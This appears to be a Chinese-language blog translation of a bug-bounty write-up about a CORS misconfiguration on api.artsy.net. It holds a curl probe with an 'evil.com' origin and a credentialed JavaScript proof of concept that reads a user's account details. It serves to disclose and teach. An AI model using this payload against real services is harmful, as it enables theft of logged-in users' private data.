第十篇翻译:CORS跨域请求

原文:Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net

漏洞:跨域请求

作者:Muhammad Khizer Javed

难度:低

  大家好!几个月来我测试了许多不同站点的CORS(跨域资源共享)问题,以便我能更实际的了解它。如果想要测试一个站点是否存在CORS漏洞,我们先用curl来检测

1
curl https://api.artsy.net -H "Origin: https://evil.com" -I

 正如您所见,Curl请求的响应包括如下所示,这意味着该站点存在CORS漏洞

1
2
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://evil.com

  现在需要做的就是找一个能获取用户信息的API接口,然后构建我们的EXP站点

1
https://api.artsy.net/api/user_details/user

[*]payload代码

1
2
3
4
5
6
7
8
9
10
11
12
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML =
alert(this.responseText);
}
};
xhttp.open("GET", "https://api.artsy.net/api/user_details/<User-ID>", true);
xhttp.withCredentials = true;
xhttp.send();
}

##

打赏译者

本文标题:第十篇翻译:CORS跨域请求

文章作者:TimeS0ng

发布时间:2018-12-23, 18:33:56

最后更新:2019-03-08, 18:09:39

原始链接:http://TimeS0ng.github.io/2018/12/23/第十篇翻译:CORS跨域请求/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 原文:Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net
  2. 2. 漏洞:跨域请求
  3. 3. 作者:Muhammad Khizer Javed
  4. 4. 难度:低
  5. 5.   大家好!几个月来我测试了许多不同站点的CORS(跨域资源共享)问题,以便我能更实际的了解它。如果想要测试一个站点是否存在CORS漏洞,我们先用curl来检测
  6. 6.  正如您所见,Curl请求的响应包括如下所示,这意味着该站点存在CORS漏洞
  7. 7.   现在需要做的就是找一个能获取用户信息的API接口,然后构建我们的EXP站点
  • 打赏译者
    • |